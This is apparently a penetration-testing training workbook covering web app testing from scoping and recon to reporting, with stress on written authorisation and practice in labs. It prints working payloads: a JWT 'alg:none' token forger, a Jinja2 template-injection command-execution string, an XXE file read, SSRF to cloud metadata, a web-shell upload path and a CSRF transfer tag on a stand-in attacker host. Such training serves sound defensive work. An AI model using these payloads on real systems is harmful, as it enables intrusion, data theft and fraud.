πŸ”’

Sign In Required

This workbook requires a free KaliRange account.

Log In β†’Create Account

Chapter 1 β€” Web Pentest Methodology

Professional web application testing follows a structured methodology. Rushing to exploitation without proper reconnaissance leads to missed vulnerabilities.

# The web pentest phases:
1. Scoping     β†’ define what's in/out of scope, get written authorisation
2. Recon       β†’ passive info gathering (OSINT, DNS, tech stack)
3. Mapping     β†’ spider the application, discover all endpoints
4. Testing     β†’ test each area systematically (OWASP methodology)
5. Exploitation β†’ exploit confirmed vulnerabilities (with care)
6. Post-Exploit β†’ assess impact, pivot if authorised
7. Reporting   β†’ document findings with CVSS scores and remediation

# Essential tool setup
Burp Suite β†’ the core tool (intercept, repeat, intruder, scanner)
Firefox    β†’ configured to proxy through Burp (127.0.0.1:8080)
FoxyProxy  β†’ browser extension to easily toggle proxy on/off

Chapter 2 β€” Recon & Application Mapping

# Passive recon β€” never touching the target
whois target.com
dig target.com ANY
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq '.[].name_value' | sort -u
theHarvester -d target.com -b all

# Active recon β€” crawling the application
# In Burp: Spider the site
Target β†’ Site Map β†’ right-click target β†’ Spider this host

# Directory bruteforce
gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,js

# Technology fingerprinting
whatweb https://target.com
curl -I https://target.com    # check Server, X-Powered-By headers

# JavaScript file analysis β€” often contains endpoints, API keys
# In Burp: Target β†’ Site Map β†’ filter by .js
# Or use: linkfinder.py -i https://target.com -d

Chapter 3 β€” Authentication Testing

# Test for weak credentials
admin:admin, admin:password, admin:123456, test:test

# Username enumeration
# Different error messages for valid vs invalid usernames?
# "User not found" vs "Incorrect password" β†’ enumerates users!

# Brute-force with Burp Intruder
# Intercept login β†’ Send to Intruder
# Position: mark password field as Β§passwordΒ§
# Payload: load wordlist
# Start attack β†’ sort by length (different response = hit)

# Password reset vulnerabilities
# Predictable reset tokens? (time-based, sequential, short)
# Token reuse? (can old tokens still work?)
# Host header injection? (reset link goes to wrong domain)

# Multi-factor authentication bypass
# Skip the MFA step entirely (direct URL navigation)?
# Response manipulation (change 2FA "invalid" to "valid")?
# Brute-force 4-6 digit codes (no rate limiting)?

Chapter 4 β€” Session Management

# Analyse session tokens in Burp Sequencer
# Intruder β†’ Sequencer β†’ select cookie β†’ Start live capture
# Burp analyses randomness β€” low entropy = predictable tokens

# Cookie security flags
# Check for missing flags:
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict

# Missing HttpOnly β†’ XSS can steal the cookie
# Missing Secure   β†’ sent over HTTP (MITM risk)
# Missing SameSite β†’ CSRF vulnerability

# JWT token testing
# Decode at jwt.io β†’ check algorithm
# "alg": "none" attack β†’ remove signature, change claims

# Check for JWT "alg:none" vulnerability
# Original JWT: header.payload.signature
# Modified:     header_none.modified_payload.  (empty signature)

python3 -c "
import base64, json
header = base64.urlsafe_b64encode(json.dumps({'alg':'none','typ':'JWT'}).encode()).rstrip(b'=')
payload = base64.urlsafe_b64encode(json.dumps({'user':'admin','role':'admin'}).encode()).rstrip(b'=')
print(f'{header.decode()}.{payload.decode()}.')
"

Chapter 5 β€” Input Validation Vulnerabilities

# Test EVERY input field with:
'           β†’ SQLi test
<script>alert(1)</script> β†’ XSS test
../../../etc/passwd       β†’ Path traversal
; id                      β†’ Command injection
${7*7}                    β†’ SSTI (Server Side Template Injection)

# SSTI β€” Server Side Template Injection
# If ${7*7} returns 49 in the output β†’ SSTI confirmed!
# Jinja2 (Python): {{7*7}}         β†’ 49
# Twig (PHP):      {{7*7}}         β†’ 49
# FreeMarker:      ${7*7}          β†’ 49

# SSTI β†’ RCE in Jinja2
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

# XXE β€” XML External Entity
# If the app accepts XML input:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>

Chapter 6 β€” Access Control (IDOR, Privilege Escalation)

# IDOR β€” Insecure Direct Object Reference
# Change IDs in URLs/parameters to access others' data
GET /api/user/1001/profile β†’ /api/user/1002/profile
GET /download?file=invoice_1001.pdf β†’ file=invoice_1002.pdf

# Horizontal vs Vertical privilege escalation
# Horizontal: access other USERS' data (same privilege level)
# Vertical:   access ADMIN functionality from a normal user account

# Test for vertical privesc
# Browse to admin URLs while logged in as normal user:
/admin, /admin/panel, /dashboard/admin, /management

# Parameter pollution
# POST /changepassword
# user_id=victim_id&user_id=attacker_id  β†’ which one does the server use?

# Forced browsing
# Remove authentication (delete cookie) and try to access protected pages
# Does the app redirect? Or just load anyway?

Chapter 7 β€” API Testing

# Find API documentation
/api/docs, /swagger, /api/swagger.json, /openapi.json
/v1/api, /v2/api (look for versioning)

# Common API vulnerabilities:
Broken Object Level Auth (BOLA) β†’ IDOR in APIs (change user_id)
Mass Assignment β†’ send extra JSON fields ({"role":"admin"})
Lack of Rate Limiting β†’ brute-force passwords/OTPs
Excessive Data Exposure β†’ API returns more data than needed
Improper Auth β†’ endpoints work without auth token

# Test with curl
curl -H "Authorization: Bearer TOKEN" https://api.target.com/v1/users
curl -X POST -H "Content-Type: application/json" \
  -d '{"username":"admin","role":"admin"}' \
  https://api.target.com/v1/register

Chapter 8 β€” Business Logic Flaws

# Business logic flaws are unique to each application
# They require understanding WHAT the app is supposed to do

# Common examples:
Price manipulation:
  β†’ Change price in request: price=0.01 instead of 99.99
  β†’ Apply coupon codes multiple times
  β†’ Negative quantities (get money back)

Workflow bypass:
  β†’ Skip payment step and go directly to order confirmation
  β†’ Complete step 3 without doing step 2

Race conditions:
  β†’ Transfer $100 twice simultaneously to double-spend
  β†’ Redeem a coupon multiple times with parallel requests

Account takeover:
  β†’ Register email with variations: admin@target.com vs admin+test@target.com
  β†’ Case sensitivity: Admin@target.com vs admin@target.com

Chapter 9 β€” File & Upload Vulnerabilities

# See the dedicated lab: labs/file-upload.html
# Key tests for any upload feature:

# 1. What extensions are allowed?
# Upload: .php, .php5, .phtml, .php.jpg, .aspx

# 2. What directory is the upload saved to?
# Check HTTP response, check JavaScript, check filename in HTML

# 3. Can you read back the uploaded file?
# Navigate to the upload path and see if it's web-accessible

# 4. Path traversal in filename
# Filename: ../../../../var/www/html/shell.php
# The file might be saved outside the intended directory

Chapter 10 β€” Server-Side Attacks

# SSRF β€” Server Side Request Forgery
# App fetches a URL for you β†’ redirect it to internal services
?url=http://localhost/admin
?url=http://169.254.169.254/latest/meta-data/  β†’ AWS metadata
?url=file:///etc/passwd

# Blind SSRF β€” no output visible
# Use Burp Collaborator or interactsh for OOB detection:
?url=http://your-collaborator-url.oastify.com

# Deserialization attacks
# Serialized objects in cookies/params β†’ modify them for RCE
# Java: ysoserial
# PHP: phpggc
# Python: marshal, pickle

# Template Injection (SSTI) β†’ RCE
# Test: {{7*7}}, ${7*7}, #{7*7}, *{7*7}
# If 49 appears β†’ SSTI confirmed β†’ escalate to RCE

Chapter 11 β€” Client-Side Attacks

# XSS β†’ Cookie theft, phishing, keyloggers (see XSS lab)
# CSRF β€” Cross-Site Request Forgery

# CSRF: trick a victim into making requests on your behalf
<!-- Hosted on attacker.com -->
<img src="https://target.com/transfer?to=attacker&amount=1000">
<!-- When victim visits attacker.com while logged into target.com,
     their browser silently makes this request with their cookies -->

# Test for missing CSRF tokens
# 1. Intercept a state-changing request (password change, email change)
# 2. Is there a CSRF token in the request?
# 3. If yes: can you remove it or reuse an old one?
# 4. Does the app check the Origin/Referer header?

# Clickjacking β€” embed target site in iframe to trick clicks
# Check for X-Frame-Options header:
# Missing β†’ site is clickjackable
curl -I https://target.com | grep -i "x-frame"

Chapter 12 β€” Writing a Web Pentest Report

# Report structure:
1. Executive Summary (non-technical β€” for management)
   β†’ Tested: target.com (June 2025)
   β†’ Found: 2 Critical, 3 High, 5 Medium vulnerabilities
   β†’ Overall risk: HIGH

2. Scope & Methodology
   β†’ What was tested, dates, tools used, exclusions

3. Findings (one section per vulnerability)
   β†’ Name: SQL Injection in login form
   β†’ CVSS Score: 9.8 Critical
   β†’ Description: What the vulnerability is
   β†’ Evidence: Screenshot + request/response from Burp
   β†’ Impact: An attacker can dump the entire database
   β†’ Remediation: Use parameterised queries / prepared statements

4. Remediation Summary Table
   β†’ ID, Vulnerability, Severity, Status

5. Appendix
   β†’ Full tool output, all URLs tested

# CVSS Severity levels:
9.0-10.0 β†’ Critical
7.0-8.9  β†’ High
4.0-6.9  β†’ Medium
0.1-3.9  β†’ Low
βœ…
Workbook Complete! You now have a full web app pentest methodology. Practice on DVWA, WebGoat, and HackTheBox Web challenges. For certification, look at eWPT (web pentesting) from eLearnSecurity.
Practice: Burp Suite Lab β†’ ← All Workbooks
πŸ“–
Sign in to track progress